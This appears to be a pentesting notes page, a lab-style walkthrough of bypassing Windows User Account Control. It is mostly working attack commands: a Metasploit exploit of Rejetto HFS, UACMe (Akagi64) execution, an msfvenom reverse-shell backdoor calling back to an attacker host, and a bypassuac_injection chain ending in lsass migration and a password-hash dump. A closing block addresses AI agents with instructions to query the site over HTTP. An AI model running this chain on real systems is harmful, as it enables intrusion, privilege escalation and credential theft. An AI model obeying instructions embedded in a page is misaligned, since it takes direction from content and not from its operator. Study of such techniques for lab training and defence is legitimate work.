# Bypassing UAC
User Account Control (UAC) is a **Windows security feature** introduced in **Windows Vista** to prevent **unauthorized system changes**. It ensures that any modification to the operating system **requires approval** from an administrator or a user with administrative privileges.
* **Non-privileged users** executing programs with elevated privileges will receive a **UAC credential prompt**.
* **Privileged users** will see a **UAC consent prompt** before the action is approved.
## **Bypassing**
To **bypass UAC**, an attacker needs access to a **local administrator account** on the target system.
* UAC **prompts users** before executing programs with administrative rights.
* UAC operates at **different integrity levels** (**Low to High**). If set **below High**, certain programs can execute **without user confirmation**.
* Various **tools and techniques** can be used to **bypass UAC**, depending on the Windows version.
## **UACMe**
**UACMe** is an **open-source** and **powerful** privilege escalation tool. It automates **UAC bypass techniques** to execute processes with **elevated privileges** without triggering UAC prompts.
{% embed url="" %}
It provides a comprehensive and well-documented list of methods for bypassing UAC across multiple Windows versions, from Windows 7 to Windows 10. By exploiting the built-in Windows AutoElevate tool, it enables attackers to execute malicious payloads on a target system with administrative or elevated privileges.
{% code overflow="wrap" %}
```bash
## TARGET MACHINE
# Lists all user accounts on the system. This command helps identify available user accounts, including standard and administrator accounts.
net users
# Displays the members of the local Administrators group.
net localgroup administrators
```
{% endcode %}
{% code overflow="wrap" %}
```bash
## ATTACKER MACHINE
nmap [TARGET IP]
# w/ Metasploit
msfconsole
setg RHOSTS [TARGET IP]
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
exploit
```
{% endcode %}
{% code overflow="wrap" %}
```bash
## TARGET MACHINE using meterpreter
# target machine local enumeration
sysinfo
pgrep explorer / ps -S explorer.exe
migrate 2448
getsystem # elevation check
getuid
getprivs
shell
net user
net localgroup administrators
## ATTACKER MACHINE
# using UACMe
# Source > Akagi
# Default Settings required. Run executable from command line:
akagi32 [Key] [Param]
# or
akagi64 [Key] [Param]
# First parameter is number of method to use, second is optional command (executable file name including full path) to run. Second parameter can be empty - in this case program will execute elevated cmd.exe from system32 folder.
# binary needs to be compiled
# meterpreter payload > upload that to the target > bypass UAC to execute this
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACKER IP] LPORT=[PORT] -f exe > backdoor.exe
# multi handler setup
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT [PORT]
exploit
## TARGET MACHINE using meterpreter
pwd
getuid
getprivs
cd C:\\
mkdir Temp
cd Temp
upload backdoor.exe
upload Akagi64.3xe
Akagi64.exe 23 backdoor.exe
# new meterpreter session with elevated privilege in the handler
```
{% endcode %}
I started by gathering basic information on the **target machine**, listing all user accounts (`net users`) and identifying members of the **Administrators group** (`net localgroup administrators`). Then, from the **attacker machine**, I scanned the target using **Nmap** to identify open ports and services.
I leveraged **Metasploit** to exploit the **Rejetto HFS** vulnerability, gaining an initial foothold on the target. Once inside, I used **Meterpreter** to enumerate system details (`sysinfo`), check running processes (`pgrep explorer`), migrate to a stable process, and verify privileges.
To escalate privileges, I utilized **UACMe**, an open-source privilege escalation tool, to bypass User Account Control (UAC). I created a **Meterpreter payload** using `msfvenom`, uploaded it to the **target machine**, and executed it with elevated privileges using **UACMe** (`Akagi64.exe 23 backdoor.exe`).
Finally, I set up a **multi-handler** on Metasploit to catch the reverse shell connection from the backdoor, successfully establishing a **new Meterpreter session** with **elevated privileges** on the target.
## Memory Injection w/ Metasploit
```
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
getsystem
getuid
ps -S lsass.exe
migrate 484
hashdump
```
I used the **bypassuac\_injection** exploit to escalate privileges on a Windows machine. After setting the session and payload, I executed the exploit.
Once inside, I ran **getsystem** to gain **SYSTEM privileges** and confirmed my user identity with **getuid**.
Next, I listed processes searching for **lsass.exe** and migrated to its PID (**484**) for stability. Finally, I dumped password hashes using **hashdump** for credential extraction.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://security.navidnaf.com/marauders-boost/windows-privesc/bypassing-uac.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.